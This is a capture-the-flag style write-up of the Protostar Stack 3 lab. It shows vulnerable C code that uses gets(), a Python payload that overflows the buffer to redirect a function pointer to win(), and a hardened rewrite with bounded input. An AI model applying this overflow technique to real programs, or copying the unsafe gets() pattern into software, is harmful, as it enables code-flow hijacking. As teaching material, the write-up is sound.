Stack 3 source
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
    printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
    volatile int (*fp)();
    char buffer[64];

    fp = 0;

    gets(buffer);

    if(fp) {
        printf("calling function pointer, jumping to 0x%08x\n", fp);
        fp();
    }
}
To redirect fp we need the address of win in the text segment, which objdump gives us:
objdump -S stack3 | grep win
Output:
08048424 <win>:
Now we need to write the address 0x08048424 into the function pointer. The buffer is 64 bytes, so 64 bytes of padding followed by the address, written little-endian as x86 stores it, lands on fp. stack3.py (Python 2, so that print emits the raw bytes; the trailing newline print adds is harmless because gets() stops reading there):
print( "A"*64+"\x24\x84\x04\x08")
Finally, to feed the payload to the program we run:
python stack3.py | /opt/protostar/bin/stack3
and the program prints:
calling function pointer, jumping to 0x08048424
code flow successfully changed
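As an added defensive counterpart (not part of the original writeup or of Protostar), here is the same main() with gets() replaced by a bounded line reader: an over-long line is drained and rejected instead of spilling into fp. The helper names, the 63-byte line limit and the tmpfile-based feed() helper are my own choices for this illustration.

```c
#include <stdio.h>
#include <string.h>

/* Bounded replacement for gets(): reads one line into buf (capacity cap),
   strips the newline and returns the line length. A line that does not fit
   is drained from the stream and rejected with -1, so nothing is written
   past the end of buf into whatever sits above it on the stack. */
static int read_line_bounded(char *buf, size_t cap, FILE *in)
{
    if (cap == 0 || fgets(buf, (int)cap, in) == NULL)
        return -1;
    size_t len = strcspn(buf, "\n");
    if (buf[len] == '\n') {            /* whole line fit, newline included */
        buf[len] = '\0';
        return (int)len;
    }
    int c = fgetc(in);                  /* buffer is full: what comes next? */
    if (c == EOF || c == '\n')          /* exactly cap-1 bytes, or last line */
        return (int)len;
    while ((c = fgetc(in)) != EOF && c != '\n')
        ;                               /* line too long: discard the rest */
    buf[0] = '\0';
    return -1;
}

/* stack3's main() with the same locals but a bounded read. Returns the
   number of bytes accepted, -1 if the line was rejected, -2 if fp changed. */
static int stack3_hardened(FILE *in)
{
    volatile int (*fp)(void) = 0;
    char buffer[64];
    int n = read_line_bounded(buffer, sizeof buffer, in);
    if (n < 0)
        fputs("input rejected: line longer than 63 bytes\n", stderr);
    if (fp)                             /* unreachable with a bounded read */
        return -2;
    return n;
}

/* Feeds a constructed payload to stack3_hardened() through a temp file. */
static int feed(const char *payload)
{
    FILE *f = tmpfile();
    if (!f) return -3;
    fputs(payload, f);
    rewind(f);
    int r = stack3_hardened(f);
    fclose(f);
    return r;
}
```

feed() of the 68-byte payload from the writeup returns -1 and fp stays NULL, while a 63-character line is still accepted in full.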